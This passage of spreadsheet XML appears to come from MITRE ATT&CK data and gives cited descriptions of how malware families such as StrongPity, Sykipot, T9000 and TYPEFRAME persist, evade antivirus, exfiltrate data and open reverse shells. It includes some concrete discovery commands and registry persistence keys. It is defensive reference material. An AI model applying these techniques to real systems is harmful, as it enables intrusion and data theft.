    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has obfuscated its module with an alphabet-based table or XOR encryption.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has relied on injecting its payload directly into the process memory of the victim's preferred browser.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has looked in the registry to find the default browser path.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can take screenshots.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can check for antivirus and antimalware programs.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has the capability to discover the system OS, Windows version, architecture and environment.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) can obtain the current date and time of the victim machine.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has several VBS scripts used throughout the malware's lifecycle.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) has used the WMI command-line (WMIC) utility to run tasks.(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate drive types.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to modify the Registry.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate processes.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) uses rundll32 to call an exported function.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to scan for security tools such as firewalls and antivirus tools.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to enumerate system information.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) has the ability to remotely execute commands.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.(Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has encrypted C2 traffic using SSL/TLS.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can automatically exfiltrate collected documents to the C2 server.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been signed with self-signed certificates.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can add directories used by the malware to the Windows Defender exclusions list to prevent detection.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can exfiltrate collected documents through C2 channels.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can delete previously exfiltrated files from the compromised host.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can parse the hard drive on a compromised host to identify specific file extensions.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has the ability to hide the console window for its document search module from the user.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can download files to specified targets.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been executed via compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has named services to appear legitimate.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has been bundled with legitimate software installation files for disguise.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">
[StrongPity](https://attack.mitre.org/software/S0491) has used HTTPS over port 1402 in C2 communication.(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has used encrypted strings in its dropper component.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use PowerShell to add files to the Windows Defender exclusions list.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can determine if a user is logged in by checking to see if explorer.exe is running.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key for persistence.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify if ESET or BitDefender antivirus are installed before dropping its payload.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can install a service to execute itself as a service.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify the hard disk volume serial number on a compromised host.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can identify the IP address of a compromised host.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) can use HTTP and HTTPS in C2 communications.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) has created new services and modified existing services for persistence.(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) uses SSL for encrypting C2 communications.(Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net group "domain admins" /domain&lt;/code&gt; to display accounts in the "domain admins" permissions group and &lt;code&gt;net localgroup "administrators"&lt;/code&gt; to list local system administrator group membership.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) contains keylogging functionality to steal passwords.(Citation: Alienvault Sykipot DOD Smart Cards)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may gather a list of running processes by running &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) has been known to establish persistence by adding programs to the Run Registry key.(Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net view /domain&lt;/code&gt; to display hostnames of available systems on a network.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;ipconfig /all&lt;/code&gt; to gather system network configuration details.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;netstat -ano&lt;/code&gt; to display active network connections.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net start&lt;/code&gt; to display running services.(Citation: AlienVault Sykipot 2011)</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.(Citation: Alienvault Sykipot DOD Smart Cards)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) clears event logs.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) encrypts the victims machine followed by asking the victim to pay a ransom. (Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) checks its directory location in an attempt to avoid launching in a sandbox.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) can manipulate Registry keys.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) parses the export tables of system DLLs to locate and call various Windows API functions.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates all running processes.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) abuses NTFS transactions to launch and conceal malicious processes.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates Registry keys associated with event logs.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) gathers user names from infected hosts.(Citation: SecureList SynAck Doppelgänging May 2018)</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) enumerates all running services.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the group name of the logged-in user and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) uses an XOR 0x1 loop to encrypt its C2 domain.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the computer name, OS versioning information, and OS install date and sends the information to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the local IP address of the victim and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) collects the account name of the logged-in user and sends it to the C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) uses HTTP for C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather information about the operating system.(Citation: TechNet Systeminfo)</t>
  </si>
  <si>
    <t>If a victim meets certain criteria, [T9000](https://attack.mitre.org/software/S0098) uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll&lt;/code&gt; and &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1&lt;/code&gt;.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) encrypts collected data using a single byte XOR key.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) uses the Skype API to record audio and video calls. It writes encrypted data to &lt;code&gt;%APPDATA%\Intel\Skype&lt;/code&gt;.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) searches removable storage devices for files with a pre-defined list of file extensions (e.g. * .doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>During the [T9000](https://attack.mitre.org/software/S0098) installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) searches through connected drives for removable storage devices.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) performs checks for various antivirus and security products during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the operating system build number and CPU Architecture (32-bit/64-bit) during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the MAC and IP addresses during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) gathers and beacons the system time during installation.(Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) has used &lt;code&gt;FileReadZipSend&lt;/code&gt; to compress a file and send to C2.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;FileRecvWriteRand&lt;/code&gt; to append random bytes to the end of a file received from C2.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can randomly pick one of five hard-coded IP addresses for C2 communication; if one of the IP fails, it will wait 60 seconds and then try another IP address.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can delete files from a compromised host.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can use &lt;code&gt;DirectoryList&lt;/code&gt; to enumerate files in a specified directory.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can download additional modules from its C2 server.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>The [TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) main executable has disguised itself as Microsoft’s Narrator.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;ProcessList&lt;/code&gt; for process discovery.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) has used FakeTLS for session authentication.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can copy itself into the current user’s Startup folder as “Narrator.exe” for persistence.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>The [TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) command and execution module can perform target system enumeration.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) uses a Linear Feedback Shift Register (LFSR) algorithm for network encryption.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can use &lt;code&gt;DriveList&lt;/code&gt; to retrieve drive information.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;GetLocalTime&lt;/code&gt; for time discovery.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can change the timestamp of specified filenames.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can enable Windows CLI access and execute files.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) creates then deletes log files during installation of itself as a service.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) has a command to download and execute an additional file.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>After creating a new service for persistence, [TDTESS](https://attack.mitre.org/software/S0164) sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) provides a reverse shell on the victim.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>If running as administrator, [TDTESS](https://attack.mitre.org/software/S0164) installs itself as a new service named bmwappushservice to establish persistence.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) was decoded using a custom rolling XOR algorithm to execute a customized [Cobalt Strike](https://attack.mitre.org/software/S0154) payload.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Check Point Sunburst Teardrop December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) files had names that resembled legitimate Window file and directory names.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) modified the Registry to create a Windows service for itself on a compromised host.(Citation: Check Point Sunburst Teardrop December 2020)</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Check Point Sunburst Teardrop December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[TEARDROP](https://attack.mitre.org/software/S0560) checked that &lt;code&gt;HKU\SOFTWARE\Microsoft\CTF&lt;/code&gt; existed before decoding its embedded payload.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) ran as a Windows service from the &lt;code&gt;c:\windows\syswow64&lt;/code&gt; folder.(Citation: Check Point Sunburst Teardrop December 2020)(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) uses DNS TXT records for C2.(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) executes cmd.exe to provide a reverse shell to adversaries.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>When a document is found matching one of the extensions in the configuration, [TINYTYPHON](https://attack.mitre.org/software/S0131) uploads it to the C2 server.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) has used XOR with 0x90 to obfuscate its configuration file.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) installs itself under Registry Run key to establish persistence.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to steal saved passwords from the Internet Explorer, Edge, Firefox, and Chrome browsers.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to decrypt, load, and execute a DLL and its resources.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to discover drive information on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to upload and download files to and from the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) can use ICMP to receive information on the destination server.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to list processes on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to proxy communications with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has encrypted network communications with RC4.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to identify the IP of the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) has the ability to execute shell commands on the infected host.(Citation: JPCert TSCookie March 2018)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of injecting code into the APC queue of a created [Rundll32](https://attack.mitre.org/techniques/T1218/011) process as part of an "Early Bird injection."(Citation: CyberBit Early Bird Apr 2018)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of downloading additional files.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of writing to a Registry Run key to establish.(Citation: CyberBit Early Bird Apr 2018)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of taking screenshots.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of gathering system information.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of creating a reverse shell.(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>One [TYPEFRAME](https://attack.mitre.org/software/S0263) variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value "0x35".(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can open the Windows Firewall on the victim’s machine to allow incoming connections.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can delete files off the system.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can search directories for files on the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can upload and download files to the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>A Word document delivering [TYPEFRAME](https://attack.mitre.org/software/S0263) prompts the user to enable macro execution.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can install encrypted configuration data under the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs&lt;/code&gt;.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) has used ports 443, 8080, and 8443 with a FakeTLS method.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>APIs and strings in some [TYPEFRAME](https://attack.mitre.org/software/S0263) variants are RC4 encrypted. Another variant is encoded with XOR.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>A [TYPEFRAME](https://attack.mitre.org/software/S0263) variant can force the compromised system to function as a proxy server.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can gather the disk volume information.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) has used a malicious Word document for delivery with VBA macros for execution.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) can uninstall malware components using a batch script.(Citation: US-CERT TYPEFRAME June 2018) [TYPEFRAME](https://attack.mitre.org/software/S0263) can execute commands using a shell.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
